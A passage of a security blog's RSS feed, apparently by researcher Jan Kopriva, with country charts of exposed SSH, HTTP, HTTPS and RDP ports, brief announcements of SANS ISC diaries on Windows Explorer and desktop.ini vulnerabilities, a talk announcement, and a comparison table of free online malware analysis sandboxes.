&lt;h2 id=&#34;china&#34;&gt;China&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/china-ssh.png&#34; alt=&#34;China - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/china-http.png&#34; alt=&#34;China - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/china-https.png&#34; alt=&#34;China - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/china-rdp.png&#34; alt=&#34;China - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;italy&#34;&gt;Italy&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/italy-ssh.png&#34; alt=&#34;Italy - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/italy-http.png&#34; alt=&#34;Italy - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/italy-https.png&#34; alt=&#34;Italy - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/italy-rdp.png&#34; alt=&#34;Italy - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;netherlands&#34;&gt;Netherlands&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/netherlands-ssh.png&#34; alt=&#34;Netherlands - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/netherlands-http.png&#34; alt=&#34;Netherlands - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/netherlands-https.png&#34; alt=&#34;Netherlands - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/netherlands-rdp.png&#34; alt=&#34;Netherlands - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;romania&#34;&gt;Romania&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/romania-ssh.png&#34; alt=&#34;Romania - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/romania-http.png&#34; alt=&#34;Romania - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/romania-https.png&#34; alt=&#34;Romania - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/romania-rdp.png&#34; alt=&#34;Romania - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;russia&#34;&gt;Russia&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/russia-ssh.png&#34; alt=&#34;Russia - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/russia-http.png&#34; alt=&#34;Russia - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/russia-https.png&#34; alt=&#34;Russia - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/russia-rdp.png&#34; alt=&#34;Russia - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;slovakia&#34;&gt;Slovakia&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/slovakia-ssh.png&#34; alt=&#34;Slovakia - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/slovakia-http.png&#34; alt=&#34;Slovakia - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/slovakia-https.png&#34; alt=&#34;Slovakia - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/slovakia-rdp.png&#34; alt=&#34;Slovakia - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;spain&#34;&gt;Spain&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/spain-ssh.png&#34; alt=&#34;Spain - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/spain-http.png&#34; alt=&#34;Spain - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/spain-https.png&#34; alt=&#34;Spain - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/spain-rdp.png&#34; alt=&#34;Spain - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;usa&#34;&gt;USA&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/usa-ssh.png&#34; alt=&#34;USA - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/usa-http.png&#34; alt=&#34;USA - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/usa-https.png&#34; alt=&#34;USA - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/usa-rdp.png&#34; alt=&#34;USA - RDP&#34; /&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/stats.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>SSH</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>COVID-19</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Crashing explorer.exe with(out) a click</title>
        <link>https://untrustednetwork.net/en/2020/03/30/sans-isc-diary-crashing-explorer.exe-without-a-click/</link>
        <pubDate>Mon, 30 Mar 2020 07:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 30 Mar 2020 07:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/03/30/sans-isc-diary-crashing-explorer.exe-without-a-click/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a vulnerability in the way Windows handles self-referential links, which makes it possible to use specially crafted URL and LNK files to crash Explorer.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Crashing+explorerexe+without+a+click/25966/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a vulnerability in the way Windows handles self-referential links, which makes it possible to use specially crafted URL and LNK files to crash Explorer.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Post-exploitation</category>
            
          
            
              <category>Red teaming</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>CrisisCon - Breaking Windows</title>
        <link>https://untrustednetwork.net/en/2020/03/28/crisiscon-breaking-windows/</link>
        <pubDate>Sat, 28 Mar 2020 09:15:00 +0100</pubDate>
        
        <atom:modified>Sat, 28 Mar 2020 09:15:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/03/28/crisiscon-breaking-windows/</guid>
        <description>Videos of all presentations from last weeks CrisisCon are now accessible on Youtube. Among them is my own talk on known unpatched vulnerabilities and weaknesses in Windows.
If you couldn&amp;rsquo;t make it to the online conference, I recommend you at least go through some of the recordings as couple of the talks were quite interesting.</description>
        <content:encoded>&lt;p&gt;Videos of all presentations from last weeks &lt;a href=&#34;https://crisiscon.net/&#34;&gt;CrisisCon&lt;/a&gt; are now accessible on &lt;a href=&#34;https://www.youtube.com/channel/UCaHzh5ByE44ucW-gAmOReeQ&#34;&gt;Youtube&lt;/a&gt;. Among them is my own talk on &lt;a href=&#34;https://www.youtube.com/watch?v=m_FwZE-5QGE&#34;&gt;known unpatched vulnerabilities and weaknesses in Windows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you couldn&amp;rsquo;t make it to the online conference, I recommend you at least go through some of the recordings as couple of the talks were quite interesting.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Windows</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Conference</category>
            
          
        
        
          
            
              <category>2020</category>
            
          
            
              <category>Talks</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Desktop.ini as a post-exploitation tool</title>
        <link>https://untrustednetwork.net/en/2020/03/16/sans-isc-diary-desktop.ini-as-a-post-exploitation-tool/</link>
        <pubDate>Mon, 16 Mar 2020 07:55:00 +0100</pubDate>
        
        <atom:modified>Mon, 16 Mar 2020 07:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/03/16/sans-isc-diary-desktop.ini-as-a-post-exploitation-tool/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a vulnerability in the way Windows handles desktop.ini files, which makes it possible to use them as an interesting post-exploitation tool.
UPDATE 27. 5. 2020: I put together a shor video demonstrating the vulnerabiltiy while preparing materials for SANSFIRE 2020. You may find it here.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a vulnerability in the way Windows handles desktop.ini files, which makes it possible to use them as an interesting post-exploitation tool.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;UPDATE 27. 5. 2020: I put together a shor video demonstrating the vulnerabiltiy while preparing materials for &lt;a href=&#34;https://www.sans.org/event/sansfire-2020/&#34;&gt;SANSFIRE 2020&lt;/a&gt;. You may find it &lt;a href=&#34;https://www.youtube.com/watch?v=pVqJiaUnstA&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Post-exploitation</category>
            
          
            
              <category>Red teaming</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Overview of free online malware analysis sandboxes</title>
        <link>https://untrustednetwork.net/en/sandboxes/</link>
        <pubDate>Fri, 13 Mar 2020 08:14:41 +0100</pubDate>
        
        <atom:modified>Sun, 19 Mar 2023 15:25:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/sandboxes/</guid>
        <description>This page contains a list of freely accessible online malware sandboxes and analytical platforms that I currently find most useful, along with a short overview of their capabilities. The list is (and it is meant to be) non-exhaustive, but if you know of any sandbox which is not mentioned but offers interesting features, feel free to let me know about it.
If you&amp;rsquo;d like to use the table in a presentation or share it on some other site, there is a PNG version bellow to make it easier.</description>
        <content:encoded>&lt;p&gt;This page contains a list of freely accessible online malware sandboxes and analytical platforms that I currently find most useful, along with a short overview of their capabilities. The list is (and it is meant to be) non-exhaustive, but if you know of any sandbox which is not mentioned but offers interesting features, feel free to &lt;a href=&#34;https://untrustednetwork.net/en/about/&#34;&gt;let me know about it&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;d like to use the table in a presentation or share it on some other site, there is a PNG version bellow to make it easier.&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;Current version: 1.9 (3​/2023)&lt;/kbd&gt;&lt;/p&gt;
&lt;style type=&#34;text/css&#34;&gt;
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:12px;padding:1px 1px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:12px;font-weight:normal;padding:1px 1px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-contents{border-color:inherit;text-align:center;vertical-align:top}
.tg .tg-title{font-weight: bold; border-color:inherit;text-align:center;vertical-align:top;background-color:#2D2A2E;}
&lt;/style&gt;
&lt;table class=&#34;tg&#34;&gt;
  &lt;tr&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Name&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Interactive&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;OS&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Max. runtime duration&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Max input size&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;File number limits&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;URL submission&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;API access&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Requires registration&lt;/th&gt;
    &lt;th class=&#34;tg-title&#34;&gt;Note&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://jevereg.amnpardaz.com/&#34;&gt;Amnpardaz SandBox&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;XP SP2&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;20 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Requires an e-mail address for each analysis&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://any.run/&#34;&gt;Any.Run&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 32bit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;300 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;16 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://capesandbox.com/&#34;&gt;CAPEv2 Sandbox&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 32bit&lt;br&gt;W7 64bit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;30 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Limits for API use&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* Offers PCAP analysis as well&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://tria.ge/&#34;&gt;Hatching Triage&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 64bit&lt;br&gt;W10 64 bit&lt;br&gt;macOS 10.15 64 bit&lt;br&gt;Ubuntu 18.04 64 bit&lt;br&gt;Linux MIPS&lt;br&gt;Android 9 32 bit&lt;br&gt;Android 10 64 bit&lt;br&gt;Android 11 64 bit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;1800 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;No limit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* 1 GB+ file sizes supported&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://www.hybrid-analysis.com/&#34;&gt;Hybrid Analysis&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 32bit&lt;br&gt;W7 64bit&lt;br&gt;W10 64bit&lt;br&gt;Ubuntu 16.04 64 bit&lt;br&gt;Ubuntu 20.04 64 bit&lt;br&gt;Android (static analysis only)&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;360 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;100 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Limits for API use&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Registration required for API use&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://analyze.intezer.com/&#34;&gt;Intezer Analyze&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;N/A&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;N/A&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;16 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;10 files per month&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* Analysis of multiple executable and document file types&lt;br&gt;* Performs very complex static analysis&lt;br&gt;* Dynamic analysis performed by CAPE&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://iris-h.services/&#34;&gt;IRIS-H Digital Forensics&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;N/A&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;N/A&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;10 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* Analysis of malicious documents (Office formats, PDFs and LNKs)&lt;br&gt;* Not a &#34;true&#34; sandbox - only static analysis, but worth mentioning
  &lt;/tr&gt;
  &lt;!--
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://www.joesandbox.com/&#34;&gt;Joe Sandbox Cloud Basic&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 (unspecified)&lt;br&gt;W10 64bit&lt;br&gt;Android&lt;br&gt;Linux&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;500 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Max 100 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;10 files per day&lt;br&gt;30 files per month&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://metadefender.opswat.com/&#34;&gt;OPSWAT MetaDefender&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 64bit&lt;br&gt;W10 64bit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;300 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;140 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Limits for API use&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://sandbox.pikker.ee/&#34;&gt;Pikker&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 64bit&lt;br&gt;Linux&lt;br&gt;Android&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;600 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* A free-to-use Cuckoo sandbox&lt;/td&gt;
  &lt;/tr&gt;
   --&gt;
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://www.virustotal.com/&#34;&gt;VirusTotal&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Unspecified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;N/A&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;650 MB&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Limits for API use&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;* Automated multisandbox analysis of submitted samples&lt;/td&gt;
  &lt;/tr&gt;  
&lt;!--
  &lt;tr&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;a href=&#34;https://app.sndbox.com/login&#34;&gt;SNDBOX&lt;/a&gt;&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;W7 32bit&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;120 seconds&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;Not specified&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;5 files per month&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✘&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;✔&lt;/td&gt;
    &lt;td class=&#34;tg-contents&#34;&gt;&lt;/td&gt;
  &lt;/tr&gt;
--&gt;
&lt;/table&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/misc/free-malware-analysis-sandboxes-overview-current.png&#34; alt=&#34;Overview of free online malware analysis sandboxes&#34; style=&#34;width:700px; border:1px solid grey&#34;&gt;
&lt;p&gt;&lt;kbd&gt;Direct URL: &lt;a href=&#34;https://untrustednetwork.net/images/misc/free-malware-analysis-sandboxes-overview-current.png&#34;&gt;&lt;a href=&#34;https://untrustednetwork.net/images/misc/free-malware-analysis-sandboxes-overview-current.png&#34;&gt;https://untrustednetwork.net/images/misc/free-malware-analysis-sandboxes-overview-current.png&lt;/a&gt;&lt;/a&gt;&lt;/kbd&gt;&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Sandbox</category>
            
          
        
        
        
      </item>
      
      <item>
        <title>Overview of free online malware analysis sandboxes – 2020 edition</title>
        <link>https://untrustednetwork.net/en/2020/03/12/overview-of-free-online-malware-analysis-sandboxes-2020-edition/</link>
        <pubDate>Thu, 12 Mar 2020 08:33:11 +0100</pubDate>
        
        <atom:modified>Thu, 12 Mar 2020 08:33:11 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/03/12/overview-of-free-online-malware-analysis-sandboxes-2020-edition/</guid>
        <description>UPDATE 13/3/2020: Interactive (and hopefully current) version of the table may be found here.
Whether your work has anything to do with security monitoring, malware analysis, incident response, or just general IT administration, you’ve probably come across VirusTotal. It is an invaluable tool when it comes to identifying malicious code, however sometimes we need to dig a bit deeper than just getting a &amp;ldquo;detection score&amp;rdquo; for a potentially dangerous file. In such instances, we may turn to free online sandboxes (or paid or local ones, if we have access to them, but let’s assume we don’t), which can provide us with more detailed information about the behavior of our file by executing or opening it in a virtual environment and monitoring its activities.</description>
        <content:encoded>&lt;p&gt;&lt;em&gt;UPDATE 13/3/2020: Interactive (and hopefully current) version of the table may be found &lt;a href=&#34;https://untrustednetwork.net/en/sandboxes/&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
